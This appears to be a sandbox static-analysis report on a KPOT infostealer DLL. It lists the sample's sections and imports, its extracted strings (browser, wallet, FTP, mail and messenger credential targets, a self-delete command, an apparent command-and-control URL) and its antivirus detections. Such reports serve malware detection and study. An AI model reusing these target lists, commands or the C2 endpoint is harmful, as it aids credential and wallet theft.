Static | ZeroBOX

PE Compile Time

2021-07-23 07:05:52

PE Imphash

536a622ab5c7198822e97fa200e881b1

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x00023484    0x00023600        6.28191013362
.data   0x00025000       0x00002784    0x00000200        1.90718671658
.reloc  0x00028000       0x00000cc2    0x00000e00        6.10030152649

Imports

Library KERNEL32.dll:
0x10001014 GetProcessHeap
Library ADVAPI32.dll:
0x10001004 LsaFreeMemory
0x10001008 LsaClose
0x1000100c LsaOpenPolicy

Exports

Ordinal  Address     Name
1        0x10021209  Install
2        0x1002121f  __DllMainCRTStartup@12

Strings

!This program cannot be run in DOS mode.
2.RichN
`.data
.reloc
expand 32-byte k
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
%s = %s
mpr.dll
crypt32.dll
urlmon.dll
userenv.dll
shlwapi.dll
ole32.dll
oleaut32.dll
gdiplus.dll
gdi32.dll
netapi32.dll
dnsapi.dll
advapi32.dll
shell32.dll
user32.dll
ws2_32.dll
winhttp.dll
wininet.dll
%ComSpec%
__GRABBER__
__DELIMM__
FFFILEE
SYSINFORMATION
IMPAUTOFILL_DATA
CREDIT_CARD
CRED_DATA
Active Directory Domain: %s
Software:
Layouts:
LT: %s (UTC %d:%d)
PC: %s
User: %s
Screen: %dx%d
RAM: %d MB
CPU: %s (%d cores)
IP: %s
MachineGuid: %S
%d-%02d-%02d %02d:%02d:%02d
/c ping 127.0.0.1 && del "%s"
*.config
*.wallet
%NETWORK%
%FULLDISK%
Grabber
Trinity\trinity.realm
scatter
Ledger Live\app.json
Exodus
com.liberty.jaxx\IndexedDB
Jaxx\Local Storage\leveldb
strDataDir
Namecoin
Electrum
Ethereum
.wallet
keystore
Crypto
wallet.dat
wallet_path
monero-project
storages.txt
https://%S/r/%S
https://%S/a/%S
http%s://%s%S
http://%s
Host: %s
Content-Type: application/octet-stream
Content-Encoding: binary
Host: %s
Content-Type: application/x-www-form-urlencoded
Host: %s
%s?id=%S
%S %s HTTP/1.1
%SContent-Length: %d
bdns.%s
dotbit.me
185.121.177.53;169.239.202.202;
encrypted_key
os_crypt
Local State
Web Data
History
%s\key%d.db
key4.db
key3.db
encryptedPassword
encryptedUsername
logins
cookies.sqlite
signons.sqlite
formhistory.sqlite
webappsstore.sqlite
places.sqlite
Normal|%s|%s|%02d/%04d|%s
Masked|%s|%02d/%04d|%s|%s|%s
Visits count: %d
Last visit: [%d-%02d-%02d %02d:%02d:%02d]
Browsers\History\%s.txt
Browsers\Autofill\%s.txt
Browsers\Cookies\%s.txt
%s\%S.json
Login Data
wininet
Cookies
Internet Explorer
encoding
connections
UserName
HostName
0123456789ABCDEF
SmartFTP\Client 2.0\Favorites
GHISLER\wcx_ftp.ini
ixKZ-<
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FileZilla
sitemanager
recentservers
abe2869f-9b47-4cd9-a358-c22904dba7f7
Microsoft_WinInet_*
vaultcli.dll
pstorec.dll
Software\EarthVPN
Software\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Office\%d.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Windows NT\CurrentVersion
Windows\CurrentVersion\Uninstall
Internet Explorer\TypedURLs
Internet Explorer\IntelliForms\Storage2
Martin Prikryl\WinSCP 2\Sessions
Store Root
MachineGuid
{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1
DisplayVersion
DisplayName
DisplayIcon
ProductName
InstallPath
Cryptography
Microsoft
Software
accounts.xml
%s\.purple\%s
profiles
account*.oeaccount
KdfIterations
mRemoteNG\confCons.xml
\tdata\
.config
Discord\Local Storage\leveldb
loginusers
Telegram
Valve\Steam
ProhibitDTD
user.config
setting[@name='%s']
NordVPN
EarthVPN
DPAPI:
Password
Username
Hostname
Domain
Protocol
screenshot_%d.png
screenshot.png
%08lX%04lX%lu
config
password 51:b:
username:s:
full address:s:
4|mRemoteNG %s|%s|%s|%S|
1|FileZilla|%s:%s|%s|%S|
1|WS_FTP|%s|%s|%S|
1|WinSCP|%s|%s|%s|
1|TotalCommander|%s|%s|%s|
4|Remote Desktop|%s|%s|%s|
3|Pidgin|%s|%s|%s|
3|Psi(+)|%s|%s|%s|
2|EarthVPN||%s|%s|
2|NordVPN||%s|%s|
0|%s|%S|%s|%s|%s
0|%S|%s|%s|%s|%S
0|%s|%s|%s|%s|
5|Outlook|%s:%d|%s|%s|
5|Windows Mail|%s|%s|%s|
l4uadEfLpWKM
3mcogHY3yQNyiUaK
https://donattelli.com/test/php/api.php;
OS: %S x%d
%s(%S)
.bazar
fce4902a-54a9-4543-b5d9-04db464e02dd
8v.j@X+E
YYj8X+E
?vdj@X+E
h^IuAj
GetProcessHeap
KERNEL32.dll
LsaQueryInformationPolicy
LsaOpenPolicy
LsaClose
LsaFreeMemory
ADVAPI32.dll
soft.dll
Install
__DllMainCRTStartup@12
User32
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3
>%>,>5><>H>N>U>Z>`>g>n>}>
?.?;?E?L?W?m?z?
515[5r5
5!6>6J6d6y6
7!7N7_7
879H9`:e:
5/5F5Y5h5
6T6c6s6
7T7v7{7
848=8_8x8
:5:L:p:
:T;Y;h;{;
?-?A?U?i?}?
010E0Y0m0
1!151I1]1q1
2%292M2a2u2
3)3=3Q3e3y3
4-4A4U4i4}4
515E5Y5m5
6!656I6]6q6
7%797M7a7u7
8)8=8Q8e8y8
9'959C9Q9_9s9
:':;:O:c:w:
;);=;Q;_;m;
<#=L=u=
7-7:7J7\7g708F8^8y8
9!999T9l9
: :8:S:k:
=)=;=M=m=
>+>=>O>o>
?-???Q?q?
0"040F0X0x0
1171O1g1
2272W2o2
=!=<=J>Q>a>q>
?&?6?F?V?f?
0 000@0
=o?s?w?{?
3'343>3M3
6'7R7z7
:%;K;n;
;X<{<==K=h>
C0^0w0
<-=;=T=o=
??v?~?
2<475r5
666]6i6
70767R7y7
7+909<9B9
01N1T1v1
445>5y5
3{4!5r7
97<C<I<Z<
:?<f=w=
8*979W9]9e9k9
:":*:0:L:Z:
041#2r2
2_3k3w3
9$:c:w:
;.;B;x;
=$=+=2=9=@=G=N=2?
767U7d7}7
989M9\9
<6=@=J=T=`>l>
??/?5?A?
8l9y9D:
:D<L<T<^<A>
?1?<?M?^?
5U5l5x5
=m>#?L?
0$0(0,000
%08x.%s
%s\%s\%s
%s\%s\%.6ss
%s\%s\%s-Qt
%s\%s\%s\%s
monero-wallet-gui.exe
monerod.exe
Monero\wallets
%s\%s.json
*.mmd*
atomic\Local Storage\leveldb
Guarda\Local Storage\leveldb
simpleos\Local Storage\leveldb
Neon\Local Storage\leveldb
WalletWasabi\Client\Wallets
MyMonero
%s\%s\%s.xml
\\?\%s
\\?\%c:
%S\%S\%s
WinAuth\winauth.xml
%s\WinAuth\winauth.xml
Authy Desktop\Local Storage\leveldb
SMTP Server
SMTP Port
SMTP User
SMTP Password
IMAP Server
IMAP Port
IMAP User
IMAP Password
POP3 Server
POP3 Port
POP3 User
POP3 Password
IMAP_Server
IMAP_User_Name
IMAP_Password2
POP3_Server
POP3_User_Name
POP3_Password2
%s\%s\%s.vdf
%s\%s.vdf
Comment: %ls
Data:
%2.2X
%-50s %s
jjjjjj
jjjjjj
jjjjjj
Antivirus             Signature
Bkav                  Clean
Elastic               malicious (high confidence)
MicroWorld-eScan      Gen:Variant.Ursu.914724
FireEye               Gen:Variant.Ursu.914724
CAT-QuickHeal         Trojanpws.Kpot
McAfee                RDN/Generic PWS.y
Cylance               Unsafe
Zillya                Clean
K7AntiVirus           Spyware ( 0057fc6a1 )
BitDefender           Gen:Variant.Ursu.914724
K7GW                  Spyware ( 0057fc6a1 )
CrowdStrike           win/malicious_confidence_100% (W)
BitDefenderTheta      Gen:NN.ZedlaF.34050.jm4@aayQqrk
Cyren                 W32/Trojan.RFSX-3880
Symantec              ML.Attribute.HighConfidence
ESET-NOD32            a variant of Win32/Spy.Agent.QCF
Baidu                 Clean
APEX                  Malicious
Paloalto              generic.ml
ClamAV                Clean
Kaspersky             Trojan-PSW.Win32.Kpot.acp
Alibaba               TrojanPSW:Win32/Tiggre.bc58f42a
NANO-Antivirus        Clean
ViRobot               Clean
Rising                Trojan.Generic@ML.95 (RDMK:Y9FH508plRniVLZcWQpIMQ)
Ad-Aware              Gen:Variant.Ursu.914724
Sophos                Mal/Generic-S
Comodo                Malware@#17ov49eddpq4r
F-Secure              Clean
DrWeb                 Clean
VIPRE                 Clean
TrendMicro            TROJ_GEN.R002C0PGQ21
McAfee-GW-Edition     RDN/Generic PWS.y
CMC                   Clean
Emsisoft              Gen:Variant.Ursu.914724 (B)
SentinelOne           Clean
GData                 Gen:Variant.Ursu.914724
Jiangmin              Trojan.PSW.Kpot.ex
Webroot               Clean
Avira                 TR/Spy.Agent.rtyvq
MAX                   malware (ai score=82)
Antiy-AVL             Clean
Kingsoft              Win32.PSWTroj.Kpot.a.(kcloud)
Gridinsoft            Trojan.Win32.Agent.oa
Arcabit               Clean
SUPERAntiSpyware      Clean
ZoneAlarm             Clean
Microsoft             Trojan:Win32/Tiggre!rfn
Cynet                 Malicious (score: 99)
AhnLab-V3             Infostealer/Win.KPot.C4565958
Acronis               Clean
VBA32                 TrojanPSW.Kpot
ALYac                 Gen:Variant.Ursu.914724
TACHYON               Clean
Malwarebytes          Spyware.Gozi
Panda                 Trj/GdSda.A
Zoner                 Clean
TrendMicro-HouseCall  TROJ_GEN.R002C0PGQ21
Tencent               Clean
Yandex                TrojanSpy.Agent!W/ua8HUFS3s
Ikarus                Trojan-Spy.Agent
MaxSecure             Trojan.Malware.119882019.susgen
Fortinet              W32/Agent.QCF!tr.spy
AVG                   Win32:Trojan-gen
Avast                 Win32:Trojan-gen
Qihoo-360             Win32/Trojan.Generic.HygBueAA
No IRMA results available.